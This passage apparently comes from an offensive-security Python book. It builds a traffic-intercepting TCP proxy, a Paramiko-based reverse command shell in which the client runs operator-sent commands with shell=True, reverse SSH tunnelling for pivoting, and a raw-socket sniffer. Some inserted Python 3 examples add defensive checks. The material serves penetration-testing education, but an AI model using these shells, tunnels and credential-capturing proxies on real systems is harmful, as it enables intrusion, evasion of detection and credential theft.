def server_loop(local_host, local_port, remote_host, remote_port, receive_first):

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        server.bind((local_host, local_port))
    except:
        print "[!!] Failed to listen on %s:%d" % (local_host, local_port)
        print "[!!] Check for other listening sockets or correct permissions."
        sys.exit(0)

    print "[*] Listening on %s:%d" % (local_host, local_port)

    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        # print out the local connection information
        print "[==>] Received incoming connection from %s:%d" % (addr[0], addr[1])

        # start a thread to talk to the remote host
        proxy_thread = threading.Thread(target=proxy_handler,
                                        args=(client_socket, remote_host, remote_port, receive_first))
        proxy_thread.start()

def main():

    # no fancy command-line parsing here
    if len(sys.argv[1:]) != 5:
        print "Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]"
        print "Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True"
        sys.exit(0)

    # setup local listening parameters
    local_host = sys.argv[1]
    local_port = int(sys.argv[2])

    # setup remote target
    remote_host = sys.argv[3]
    remote_port = int(sys.argv[4])

    # this tells our proxy to connect and receive data
    # before sending to the remote host
    receive_first = sys.argv[5]

    if "True" in receive_first:
        receive_first = True
    else:
        receive_first = False

    # now spin up our listening socket
    server_loop(local_host, local_port, remote_host, remote_port, receive_first)

main()
Most of this should look familiar: we take in some command-line arguments and then fire up a server loop that listens for connections. When a fresh connection request comes in, we hand it off to our proxy_handler, which does all of the sending and receiving of juicy bits to either side of the data stream.
Let's dive into the proxy_handler function now by adding the following code above our main function.
def proxy_handler(client_socket, remote_host, remote_port, receive_first):

    # connect to the remote host
    remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remote_socket.connect((remote_host, remote_port))

    # receive data from the remote end if necessary
    if receive_first:  # ➊

        remote_buffer = receive_from(remote_socket)  # ➋
        hexdump(remote_buffer)  # ➌

        # send it to our response handler
        remote_buffer = response_handler(remote_buffer)  # ➍

        # if we have data to send to our local client, send it
        if len(remote_buffer):
            print "[<==] Sending %d bytes to localhost." % len(remote_buffer)
            client_socket.send(remote_buffer)

    # now lets loop and read from local,
    # send to remote, send to local
    # rinse, wash, repeat
    while True:

        # read from local host
        local_buffer = receive_from(client_socket)

        if len(local_buffer):

            print "[==>] Received %d bytes from localhost." % len(local_buffer)
            hexdump(local_buffer)

            # send it to our request handler
            local_buffer = request_handler(local_buffer)

            # send off the data to the remote host
            remote_socket.send(local_buffer)
            print "[==>] Sent to remote."

        # receive back the response
        remote_buffer = receive_from(remote_socket)

        if len(remote_buffer):

            print "[<==] Received %d bytes from remote." % len(remote_buffer)
            hexdump(remote_buffer)

            # send to our response handler
            remote_buffer = response_handler(remote_buffer)

            # send the response to the local socket
            client_socket.send(remote_buffer)

            print "[<==] Sent to localhost."

        # if no more data on either side, close the connections
        if not len(local_buffer) or not len(remote_buffer):  # ➎
            client_socket.close()
            remote_socket.close()
            print "[*] No more data. Closing connections."

            break
This function contains the bulk of the logic for our proxy. To start off, we check to make sure we don't need to first initiate a connection to the remote side and request data before going into our main loop ➊. Some server daemons will expect you to do this first (FTP servers typically send a banner first, for example). We then use our receive_from function ➋, which we reuse for both sides of the communication; it simply takes in a connected socket object and performs a receive. We then dump the contents ➌ of the packet so that we can inspect it for anything interesting. Next we hand the output to our response_handler function ➍. Inside this function, you can modify the packet contents, perform fuzzing tasks, test for authentication issues, or whatever else your heart desires. There is a complementary request_handler function that does the same for modifying outbound traffic as well. The final step is to send the received buffer to our local client. The rest of the proxy code is straightforward: we continually read from local, process, send to remote, read from remote, process, and send to local until there is no more data detected ➎.
Let's put together the rest of our functions to complete our proxy.
# this is a pretty hex dumping function directly taken from
# the comments here:
# http://code.activestate.com/recipes/142812-hex-dumper/
def hexdump(src, length=16):  # ➊
    result = []
    digits = 4 if isinstance(src, unicode) else 2

    for i in xrange(0, len(src), length):
        s = src[i:i+length]
        hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
        text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
        result.append(b"%04X   %-*s   %s" % (i, length*(digits + 1), hexa, text))

    print b'\n'.join(result)

def receive_from(connection):  # ➋

    buffer = ""

    # We set a 2 second timeout; depending on your
    # target, this may need to be adjusted
    connection.settimeout(2)

    try:
        # keep reading into the buffer until
        # there's no more data
        # or we time out
        while True:
            data = connection.recv(4096)

            if not data:
                break

            buffer += data
    except:
        pass

    return buffer

# modify any requests destined for the remote host
def request_handler(buffer):  # ➌
    # perform packet modifications
    return buffer

# modify any responses destined for the local host
def response_handler(buffer):  # ➍
    # perform packet modifications
    return buffer
This is the final chunk of code to complete our proxy. First we create our hex dumping function ➊ that will simply output the packet details with both their hexadecimal values and ASCII-printable characters. This is useful for understanding unknown protocols, finding user credentials in plaintext protocols, and much more. The receive_from function ➋ is used both for receiving local and remote data, and we simply pass in the socket object to be used. By default, there is a two-second timeout set, which might be aggressive if you are proxying traffic to other countries or over lossy networks (increase the timeout as necessary). The rest of the function simply handles receiving data until no more data is detected on the other end of the connection. Our last two functions ➌ ➍ enable you to modify any traffic that is destined for either end of the proxy. This can be useful, for example, if plaintext user credentials are being sent and you want to try to elevate privileges on an application by passing in admin instead of justin. Now that we have our proxy set up, let's take it for a spin.

Kicking the Tires
Now that we have our core proxy loop and the supporting functions in place, let's test this out against an FTP server. Fire up the proxy with the following options:
justin$ sudo ./proxy.py 127.0.0.1 21 ftp.target.ca 21 True
We used sudo here because port 21 is a privileged port and requires administrative or root privileges in order to listen on it. Now take your favorite FTP client and set it to use localhost and port 21 as its remote host and port. Of course, you'll want to point your proxy to an FTP server that will actually respond to you. When I ran this against a test FTP server, I got the following result:
[*] Listening on 127.0.0.1:21
[==>] Received incoming connection from 127.0.0.1:59218
0000 32 32 30 20 50 72 6F 46 54 50 44 20 31 2E 33 2E 220 ProFTPD 1.3.
0010 33 61 20 53 65 72 76 65 72 20 28 44 65 62 69 61 3a Server (Debia
0020 6E 29 20 5B 3A 3A 66 66 66 66 3A 35 30 2E 35 37 n) [::ffff:22.22
0030 2E 31 36 38 2E 39 33 5D 0D 0A .22.22]..
[<==] Sending 58 bytes to localhost.
[==>] Received 12 bytes from localhost.
0000 55 53 45 52 20 74 65 73 74 79 0D 0A USER testy..
[==>] Sent to remote.
[<==] Received 33 bytes from remote.
0000 33 33 31 20 50 61 73 73 77 6F 72 64 20 72 65 71 331 Password req
0010 75 69 72 65 64 20 66 6F 72 20 74 65 73 74 79 0D uired for testy.
0020 0A .
[<==] Sent to localhost.
[==>] Received 13 bytes from localhost.
0000 50 41 53 53 20 74 65 73 74 65 72 0D 0A PASS tester..
[==>] Sent to remote.
[*] No more data. Closing connections.
You can clearly see that we are able to successfully receive the FTP banner and send in a username and password, and that it cleanly exits when the server punts us because of incorrect credentials.
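The hexdump above is Python 2 (unicode, xrange, str bytes); the following added Python 3 example, not the book's code, gives a bytes-only version with the same column layout plus a request_handler that, instead of altering traffic, flags plaintext FTP logins like the USER/PASS lines in the transcript above. The FTP bytes it is tested on are constructed from that transcript.

```python
# Added example (Python 3, not the book's code): a bytes-only hexdump in the
# proxy's layout, and a request_handler that records plaintext FTP logins
# seen in the traffic without modifying it.
import re

# FTP login commands are one per line: "USER name\r\n", "PASS secret\r\n"
FTP_CRED_RE = re.compile(rb"^(USER|PASS) (\S+)\r?\n", re.MULTILINE)


def hexdump_lines(src, length=16):
    """Return the hexdump as a list of lines: 4-digit offset, hex bytes padded
    to a fixed column (3 chars per byte, like the proxy's hexdump), then the
    printable-ASCII rendering with '.' for everything else."""
    lines = []
    for i in range(0, len(src), length):
        chunk = src[i:i + length]
        hexa = " ".join("%02X" % b for b in chunk)
        text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append("%04X %-*s %s" % (i, length * 3, hexa, text))
    return lines


def find_plaintext_logins(buffer):
    """Return [(command, value), ...] for every FTP USER/PASS line in buffer."""
    return [(m.group(1).decode(), m.group(2).decode())
            for m in FTP_CRED_RE.finditer(buffer)]


def request_handler(buffer, log):
    """Defensive variant of the proxy's request_handler: pass the data through
    unchanged but append a note per plaintext login to `log` (a list the
    caller owns). The password itself is never written to the log."""
    for cmd, value in find_plaintext_logins(buffer):
        if cmd == "PASS":
            value = "<redacted>"
        log.append("plaintext FTP %s observed: %s" % (cmd, value))
    return buffer


if __name__ == "__main__":
    # constructed from the transcript: what the client sent to the proxy
    sample = b"USER testy\r\nPASS tester\r\n"
    print("\n".join(hexdump_lines(sample)))
    notes = []
    request_handler(sample, notes)
    print("\n".join(notes))
```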

SSH with Paramiko
Pivoting with BHNET is pretty handy, but sometimes it's wise to encrypt your traffic to avoid detection. A common means of doing so is to tunnel the traffic using Secure Shell (SSH). But what if your target doesn't have an SSH client (like 99.81943 percent of Windows systems)?
While there are great SSH clients available for Windows, like PuTTY, this is a book about Python. In Python, you could use raw sockets and some crypto magic to create your own SSH client or server, but why create when you can reuse? Paramiko using PyCrypto gives you simple access to the SSH2 protocol.
To learn about how this library works, we'll use Paramiko to make a connection and run a command on an SSH system, configure an SSH server and SSH client to run remote commands on a Windows machine, and finally puzzle out the reverse tunnel demo file included with Paramiko to duplicate the proxy option of BHNET. Let's begin.
First, grab Paramiko using the pip installer (or download it from http://www.paramiko.org/):
pip install paramiko
We'll use some of the demo files later, so make sure you download them from the Paramiko website as well.
Create a new file called bh_sshcmd.py and enter the following:
import threading
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):  # ➊
    client = paramiko.SSHClient()
    #client.load_host_keys('/home/justin/.ssh/known_hosts')  # ➋
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # ➌
    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.exec_command(command)  # ➍
        print ssh_session.recv(1024)
    return

ssh_command('192.168.100.131', 'justin', 'lovesthepython', 'id')
This is a fairly straightforward program. We create a function called ssh_command ➊, which makes a connection to an SSH server and runs a single command. Notice that Paramiko supports authentication with keys ➋ instead of (or in addition to) password authentication. Using SSH key authentication is strongly recommended on a real engagement, but for ease of use in this example, we'll stick with the traditional username and password authentication.
Because we're controlling both ends of this connection, we set the policy to accept the SSH key for the SSH server we're connecting to ➌ and make the connection. Finally, assuming the connection is made, we run the command that we passed along in the call to the ssh_command function, in our example the command id ➍.
Let's run a quick test by connecting to our Linux server:
C:\tmp> python bh_sshcmd.py
Uid=1000(justin) gid=1001(justin) groups=1001(justin)
You'll see that it connects and then runs the command. You can easily modify this script to run multiple commands on an SSH server or run commands on multiple SSH servers.
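AutoAddPolicy ➌ accepts whatever host key the server presents, which is only acceptable when, as here, you control both ends; the commented-out load_host_keys line ➋ is Paramiko's own way to pin keys. The following added Python 3 example, not the book's or Paramiko's code and using only the standard library, shows what that pin amounts to: it parses an OpenSSH public-key line, computes the same SHA256 fingerprint that ssh-keygen -l prints, and compares it in constant time against a value recorded out of band. The sample key is constructed from a fixed 32-byte value and is not a real server's key.

```python
# Added example (Python 3, standard library only, not the book's code):
# host-key pinning by OpenSSH-style SHA256 fingerprint.
import base64
import hashlib
import hmac
import struct


def _ssh_string(data):
    """SSH wire encoding of a string: 4-byte big-endian length, then bytes."""
    return struct.pack(">I", len(data)) + data


def parse_openssh_pubkey(line):
    """Return (key_type, key_blob) from a line such as 'ssh-ed25519 AAAA... comment'.

    The key type named inside the blob must match the type on the line,
    otherwise the line is rejected.
    """
    parts = line.split()
    if len(parts) < 2:
        raise ValueError("not an OpenSSH public key line")
    key_type = parts[0]
    blob = base64.b64decode(parts[1], validate=True)
    (n,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + n] != key_type.encode():
        raise ValueError("key type on line does not match the key blob")
    return key_type, blob


def sha256_fingerprint(blob):
    """OpenSSH fingerprint: 'SHA256:' + unpadded base64 of SHA-256(key blob)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def host_key_matches(pubkey_line, pinned_fingerprint):
    """True only if the key on the line has the pinned fingerprint.
    compare_digest keeps the comparison constant-time."""
    _, blob = parse_openssh_pubkey(pubkey_line)
    return hmac.compare_digest(sha256_fingerprint(blob), pinned_fingerprint)


# Constructed sample: an ed25519 public key whose 32 raw bytes are 0x00..0x1F.
SAMPLE_BLOB = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))
SAMPLE_LINE = "ssh-ed25519 " + base64.b64encode(SAMPLE_BLOB).decode() + " sample"

if __name__ == "__main__":
    # record this value out of band, then refuse to connect if it changes
    print(sha256_fingerprint(SAMPLE_BLOB))
```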
So with the basics done, let's modify our script to support running commands on our Windows client over SSH. Of course, normally when using SSH, you use an SSH client to connect to an SSH server, but because Windows doesn't include an SSH server out-of-the-box, we need to reverse this and send commands from our SSH server to the SSH client.
Create a new file called bh_sshRcmd.py and enter the following:
import threading
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):
    client = paramiko.SSHClient()
    #client.load_host_keys('/home/justin/.ssh/known_hosts')
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.send(command)
        print ssh_session.recv(1024)  # read banner
        while True:
            command = ssh_session.recv(1024)  # get the command from the SSH server
            try:
                cmd_output = subprocess.check_output(command, shell=True)
                ssh_session.send(cmd_output)
            except Exception as e:
                ssh_session.send(str(e))
        client.close()
    return

ssh_command('192.168.100.130', 'justin', 'lovesthepython', 'ClientConnected')
The first few lines are like our last program and the new stuff starts in the while True: loop. Also notice that the first command we send is ClientConnected. You'll see why when we create the other end of the SSH connection.
Now create a new file called bh_sshserver.py and enter the following:
import socket
import paramiko
import threading
import sys

# using the key from the Paramiko demo files
host_key = paramiko.RSAKey(filename='test_rsa.key')  # ➊

class Server(paramiko.ServerInterface):  # ➋
    def __init__(self):
        self.event = threading.Event()

    def check_channel_request(self, kind, chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

    def check_auth_password(self, username, password):
        if (username == 'justin') and (password == 'lovesthepython'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED

server = sys.argv[1]
ssh_port = int(sys.argv[2])

try:  # ➌
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((server, ssh_port))
    sock.listen(100)
    print '[+] Listening for connection ...'
    client, addr = sock.accept()
except Exception as e:
    print '[-] Listen failed: ' + str(e)
    sys.exit(1)
print '[+] Got a connection!'

try:  # ➍
    bhSession = paramiko.Transport(client)
    bhSession.add_server_key(host_key)
    server = Server()
    try:
        bhSession.start_server(server=server)
    except paramiko.SSHException as x:
        print '[-] SSH negotiation failed.'
    chan = bhSession.accept(20)
    if chan is None:
        # accept() returns None if the client opened no channel within 20 seconds
        raise Exception('no channel opened by client')
    print '[+] Authenticated!'  # ➎
    print chan.recv(1024)
    chan.send('Welcome to bh_ssh')
    while True:  # ➏
        try:
            command = raw_input("Enter command: ").strip('\n')
            if command != 'exit':
                chan.send(command)
                print chan.recv(1024) + '\n'
            else:
                chan.send('exit')
                print 'exiting'
                bhSession.close()
                raise Exception('exit')
        except KeyboardInterrupt:
            bhSession.close()
except Exception as e:
    print '[-] Caught exception: ' + str(e)
    try:
        bhSession.close()
    except:
        pass
    sys.exit(1)
This program creates an SSH server that our SSH client (where we want to run commands) connects to. This could be a Linux, Windows, or even OS X system that has Python and Paramiko installed. For this example, we're using the SSH key included in the Paramiko demo files ➊. We start a socket listener ➌, just like we did earlier in the chapter, and then SSHinize it ➋ and configure the authentication methods ➍. When a client has authenticated ➎ and sent us the ClientConnected message ➏, any command we type into the bh_sshserver is sent to the bh_sshclient and executed on the bh_sshclient, and the output is returned to bh_sshserver. Let's give it a go.

Kicking the Tires
For the demo, I'll run both the server and the client on my Windows machine (see Figure 2-1).
Figure 2-1. Using SSH to run commands
You can see that the process starts by setting up our SSH server ➊ and then connecting from our client ➋. The client is successfully connected ➌ and we run a command ➍. We don't see anything in the SSH client, but the command we sent is executed on the client ➎ and the output is sent to our SSH server ➏.

SSH Tunneling
SSH tunneling is amazing but can be confusing to understand and configure, especially when dealing with a reverse SSH tunnel.
Recall that our goal in all of this is to run commands that we type in an SSH client on a remote SSH server. When using an SSH tunnel, instead of typed commands being sent to the server, network traffic is sent packaged inside of SSH and then unpackaged and delivered by the SSH server.
Imagine that you're in the following situation: You have remote access to an SSH server on an internal network, but you want access to the web server on the same network. You can't access the web server directly, but the server with SSH installed does have access and the SSH server doesn't have the tools you want to use installed on it.
One way to overcome this problem is to set up a forward SSH tunnel. Without getting into too much detail, running the command ssh -L 8008:web:80 justin@sshserver will connect to the ssh server as the user justin and set up port 8008 on your local system. Anything sent to port 8008 will be sent down the existing SSH tunnel to the SSH server and delivered to the web server. Figure 2-2 shows this in action.
Figure 2-2. SSH forward tunneling
That's pretty cool, but recall that not many Windows systems are running an SSH server service. Not all is lost, though. We can configure a reverse SSH tunnelling connection. In this case, we connect to our own SSH server from the Windows client in the usual fashion. Through that SSH connection, we also specify a remote port on the SSH server that will be tunnelled to the local host and port (as shown in Figure 2-3). This local host and port can be used, for example, to expose port 3389 to access an internal system using remote desktop, or to another system that the Windows client can access (like the web server in our example).

Figure 2-3. SSH reverse tunneling
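Whichever direction the tunnel runs, the endpoint that owns both the SSH channel and the plain TCP socket ends up doing the same job: relaying bytes both ways until one side closes. The following added Python 3 example, not Paramiko's rforward.py or the book's code, shows that relay with select(), which lets either side speak first (the book's proxy, with its sequential timed receives, cannot); it is exercised offline over socketpair() with a constructed FTP-style exchange.

```python
# Added example (Python 3, not Paramiko's or the book's code): a select()-based
# bidirectional relay, the core of a tunnel endpoint, tested over socketpair().
import select
import socket
import threading


def relay(a, b, max_bytes=1 << 20):
    """Copy data between sockets a and b until both sides have closed.

    When one side reaches EOF its peer's write half is shut down, so the peer
    sees EOF as well and can finish cleanly. Returns (bytes a->b, bytes b->a).
    Raises RuntimeError if either direction exceeds max_bytes.
    """
    peer = {a: b, b: a}
    counts = {a: 0, b: 0}
    open_socks = [a, b]
    while open_socks:
        readable, _, _ = select.select(open_socks, [], [])
        for s in readable:
            data = s.recv(4096)
            if not data:
                try:
                    peer[s].shutdown(socket.SHUT_WR)
                except OSError:
                    pass  # peer already gone
                open_socks.remove(s)
                continue
            counts[s] += len(data)
            if counts[s] > max_bytes:
                raise RuntimeError("relay byte limit exceeded")
            peer[s].sendall(data)
    return counts[a], counts[b]


def run_demo():
    """Drive relay() between a 'client' and a 'service' through two
    socketpairs. The exchange is constructed (service speaks first, as FTP
    does). Returns what each side received, the EOF the service sees after
    the client closes, and the relay's byte counts."""
    client, tunnel_in = socket.socketpair()
    tunnel_out, service = socket.socketpair()
    result = {}
    worker = threading.Thread(
        target=lambda: result.update(counts=relay(tunnel_in, tunnel_out)))
    worker.start()
    try:
        service.sendall(b"220 banner\r\n")
        banner = client.recv(1024)
        client.sendall(b"USER testy\r\n")
        request = service.recv(1024)
        service.sendall(b"331 Password required\r\n")
        reply = client.recv(1024)
        client.close()
        eof = service.recv(1024)  # b"": the relay propagated the client's close
        service.close()
        worker.join(5)
    finally:
        tunnel_in.close()
        tunnel_out.close()
    return banner, request, reply, eof, result["counts"]


if __name__ == "__main__":
    print(run_demo())
```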
The Paramiko demo files include a file called rforward.py that does exactly this. It works perfectly as is so I won't just reprint that file, but I will point out a couple of important points and run through an example of how to use it. Open rforward.py, skip down to main(), and follow along.
def main():
    options, server, remote = parse_options()  # ➊

    password = None
    if options.readpass:
        password = getpass.getpass('Enter SSH password: ')

    client = paramiko.SSHClient()  # ➋
    client.load_system_host_keys()
    client.set_missing_host_key_policy(paramiko.WarningPolicy())

    verbose('Connecting to ssh host %s:%d ...' % (server[0], server[1]))
    try:
        client.connect(server[0], server[1], username=options.user,
                       key_filename=options.keyfile,
                       look_for_keys=options.look_for_keys, password=password)
    except Exception as e:
        print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e))
        sys.exit(1)

    verbose('Now forwarding remote port %d to %s:%d ...' % (options.port,
                                                            remote[0], remote[1]))

    try:
        reverse_forward_tunnel(options.port, remote[0], remote[1],
                               client.get_transport())  # ➌
    except KeyboardInterrupt:
        print('C-c: Port forwarding stopped.')
        sys.exit(0)
The few lines at the top ➊ double-check that all the necessary arguments were passed to the script before setting up the Paramiko SSH client connection ➋ (which should look very familiar). Note the WarningPolicy: an unknown server host key is accepted after printing a warning. That is convenient for a tool you point at your own SSH server, but it also means Paramiko will not stop you from connecting through a man in the middle; if that matters, use RejectPolicy and make sure the server's key is already in your known_hosts file (which is what load_system_host_keys reads). The final section in main() calls the reverse_forward_tunnel function ➌. Let's have a look at that function.
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
    transport.request_port_forward('', server_port)  # ➍
    while True:
        chan = transport.accept(1000)  # ➎
        if chan is None:
            continue

        thr = threading.Thread(target=handler, args=(chan, remote_host,  # ➏
                                                     remote_port))
        thr.setDaemon(True)
        thr.start()
In Paramiko, there are two main communication objects: transport, which is responsible for making and maintaining the encrypted connection, and channel, which acts like a socket for sending and receiving data over the encrypted transport session. Here we use Paramiko's request_port_forward to ask the SSH server to listen on a port ➍ and hand us each inbound TCP connection as a new channel ➎. Then, for each channel, we call the handler function ➏ in its own thread. One practical caveat: the empty address passed to request_port_forward asks the server to listen on all of its interfaces, but OpenSSH only honors that when GatewayPorts is enabled in sshd_config. By default the forwarded port is bound to the server's loopback interface only, which is why the test run below connects to it through 127.0.0.1. But we're not done yet.
def handler(chan, host, port):
    sock = socket.socket()
    try:
        sock.connect((host, port))
    except Exception as e:
        verbose('Forwarding request to %s:%d failed: %r' % (host, port, e))
        return

    verbose('Connected!  Tunnel open %r -> %r -> %r' % (chan.origin_addr,
                                                        chan.getpeername(),
                                                        (host, port)))
    while True:  # ➐
        r, w, x = select.select([sock, chan], [], [])
        if sock in r:
            data = sock.recv(1024)
            if len(data) == 0:
                break
            chan.send(data)
        if chan in r:
            data = chan.recv(1024)
            if len(data) == 0:
                break
            sock.send(data)
    chan.close()
    sock.close()
    verbose('Tunnel closed from %r' % (chan.origin_addr,))
And finally, the data is relayed in both directions ➐: select tells us which side has bytes waiting, and a zero-length read from either side means that side has closed, so the loop exits and both ends are torn down. Let's give it a try.

Kicking the Tires

We will run rforward.py from our Windows system and configure it to be the middleman as we tunnel traffic from a web server to our Kali SSH server.

C:\tmp\demos> rforward.py 192.168.100.133 -p 8080 -r 192.168.100.128:80 --user justin --password
Enter SSH password:
Connecting to ssh host 192.168.100.133:22 ...
C:\Python27\lib\site-packages\paramiko\client.py:517: UserWarning: Unknown ssh-rsa host key for 192.168.100.133: cb28bb4e3ec68e2af4847a427f08aa8b
  (key.get_name(), hostname, hexlify(key.get_fingerprint())))
Now forwarding remote port 8080 to 192.168.100.128:80 ...

You can see that on the Windows machine, I made a connection to the SSH server at 192.168.100.133 and opened port 8080 on that server, which will forward traffic to 192.168.100.128 port 80. So now if I browse to http://127.0.0.1:8080 on my Linux server, I connect to the web server at 192.168.100.128 through the SSH tunnel, as shown in Figure 2-4.

Figure 2-4. Reverse SSH tunnel example

If you flip back to the Windows machine, you can also see the connection being made in Paramiko:

Connected!  Tunnel open (u'127.0.0.1', 54537) -> ('192.168.100.133', 22) -> ('192.168.100.128', 80)
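The select loop in handler ➐ is the whole relay, and it is worth having on its own. The following is an added example (Python 3; it is not part of rforward.py or of Paramiko) that pulls that loop out into a stand-alone relay() function and wires it to two socket.socketpair() connections so it runs offline: one pair stands in for the channel the SSH server hands us, the other for the connection to the internal web server. Two differences from handler are deliberate: sendall() is used instead of send() so a short write never silently drops bytes, and the function reports how many bytes crossed in each direction. The request and response bytes are made up for the demonstration.

```python
import select
import socket
import threading


def relay(a, b, bufsize=4096):
    """Shuttle bytes between two connected stream sockets until either side
    closes. Returns (bytes copied a->b, bytes copied b->a)."""
    a_to_b = b_to_a = 0
    live = [a, b]
    while len(live) == 2:
        readable, _, _ = select.select(live, [], [])
        for s in readable:
            data = s.recv(bufsize)
            if not data:              # zero-length read: that peer hung up
                live.remove(s)
                break
            dst = b if s is a else a
            dst.sendall(data)         # sendall, not send: never lose a short write
            if s is a:
                a_to_b += len(data)
            else:
                b_to_a += len(data)
    a.close()
    b.close()
    return a_to_b, b_to_a


def demo():
    """Run relay() between two socketpairs (constructed stand-ins, no real hosts).
    'chan' plays the channel from the SSH server, 'sock' the internal web server.
    Returns (request seen by the server, response seen by the client, stats)."""
    client, chan = socket.socketpair()
    sock, web = socket.socketpair()
    stats = []
    t = threading.Thread(target=lambda: stats.append(relay(chan, sock)))
    t.start()

    client.sendall(b"GET / HTTP/1.0\r\n\r\n")      # browser -> tunnel
    request = web.recv(4096)                        # arrives at the web server
    web.sendall(b"HTTP/1.0 200 OK\r\n\r\nhello")    # web server -> tunnel
    response = client.recv(4096)                    # arrives at the browser
    client.close()                                  # browser hangs up ...
    t.join(5)                                       # ... and the relay winds down
    web.close()
    return request, response, stats[0]


if __name__ == "__main__":
    req, resp, (up, down) = demo()
    print("server saw %r" % req)
    print("client saw %r" % resp)
    print("%d bytes browser->server, %d bytes server->browser" % (up, down))
```

The same relay() works unchanged with a Paramiko channel in place of one socketpair end, because a channel exposes recv(), sendall() and close() and is accepted by select.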
SSH and SSH tunneling are important to understand and use. Knowing when and how to SSH and SSH tunnel is an important skill for black hats, and Paramiko makes it possible to add SSH capabilities to your existing Python tools.

We've created some very simple yet very useful tools in this chapter. I encourage you to expand and modify them as necessary. The main goal is to develop a firm grasp of using Python networking to create tools that you can use during penetration tests, post-exploitation, or while bug-hunting. Let's move on to using raw sockets and performing network sniffing, and then we'll combine the two to create a pure Python host discovery scanner.

[5] The full socket documentation can be found here: http://docs.python.org/2/library/socket.html.

[6] This discussion expands on the work by Hussam Khrais, which can be found on http://resources.infosecinstitute.com/.

Chapter 3. The Network: Raw Sockets and Sniffing

Network sniffers allow you to see packets entering and exiting a target machine. As a result, they have many practical uses before and after exploitation. In some cases, you'll be able to use Wireshark (http://wireshark.org/) to monitor traffic, or use a Pythonic solution like Scapy (which we'll explore in the next chapter). Nevertheless, there's an advantage to knowing how to throw together a quick sniffer to view and decode network traffic. Writing a tool like this will also give you a deep appreciation for the mature tools that can painlessly take care of the finer points with little effort on your part. You will also likely pick up some new Python techniques and perhaps a better understanding of how the low-level networking bits work.

In the previous chapter, we covered how to send and receive data using TCP and UDP, and arguably this is how you will interact with most network services. But underneath these higher-level protocols are the fundamental building blocks of how network packets are sent and received. You will use raw sockets to access lower-level networking information such as the raw IP and ICMP headers. In our case, we are only interested in the IP layer and higher, so we won't decode any Ethernet information. Of course, if you intend to perform any low-level attacks such as ARP poisoning or you are developing wireless assessment tools, you need to become intimately familiar with Ethernet frames and their use.

Let's begin with a brief walkthrough of how to discover active hosts on a network segment.

Building a UDP Host Discovery Tool

The main goal of our sniffer is to perform UDP-based host discovery on a target network. Attackers want to be able to see all of the potential targets on a network so that they can focus their reconnaissance and exploitation attempts.

We'll use a known behavior of most operating systems when handling closed UDP ports to determine if there is an active host at a particular IP address. When you send a UDP datagram to a closed port on a host, that host typically sends back an ICMP message indicating that the port is unreachable. This ICMP message indicates that there is a host alive, because we'd assume that there was no host if we didn't receive a response to the UDP datagram. It is essential that we pick a UDP port that is not likely to be in use, and for maximum coverage we can probe several ports to ensure we aren't hitting an active UDP service. Keep the limits in mind, though: a host whose firewall silently drops the probe sends nothing back, and Linux rate-limits outgoing ICMP errors by default, so a missing reply is not proof that nothing is there.

Why UDP? There's no overhead in spraying the message across an entire subnet and waiting for the ICMP responses to arrive accordingly. This is quite a simple scanner to build, with most of the work going into decoding and analyzing the various network protocol headers. We will implement this host scanner for both Windows and Linux to maximize the likelihood of being able to use it inside an enterprise environment.

We could also build additional logic into our scanner to kick off full Nmap port scans on any hosts we discover to determine if they have a viable network attack surface. These are exercises left for the reader, and I look forward to hearing some of the creative ways you can expand this core concept.

Let's get started.

Packet Sniffing on Windows and Linux

Accessing raw sockets in Windows is slightly different than on its Linux brethren, but we want to have the flexibility to deploy the same sniffer to multiple platforms. We will create our socket object and then determine which platform we are running on. Windows requires us to set some additional flags through a socket input/output control (IOCTL),[7] which enables promiscuous mode on the network interface. In our first example, we simply set up our raw socket sniffer, read in a single packet, and then quit.
import socket
import os

# host to listen on
host = "192.168.0.196"

# create a raw socket and bind it to the public interface
if os.name == "nt":
    socket_protocol = socket.IPPROTO_IP  # ➊
else:
    socket_protocol = socket.IPPROTO_ICMP

sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)

sniffer.bind((host, 0))

# we want the IP headers included in the capture
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  # ➋

# if we're using Windows, we need to send an IOCTL
# to set up promiscuous mode
if os.name == "nt":  # ➌
    sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

# read in a single packet
print sniffer.recvfrom(65565)  # ➍

# if we're using Windows, turn off promiscuous mode
if os.name == "nt":  # ➎
    sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
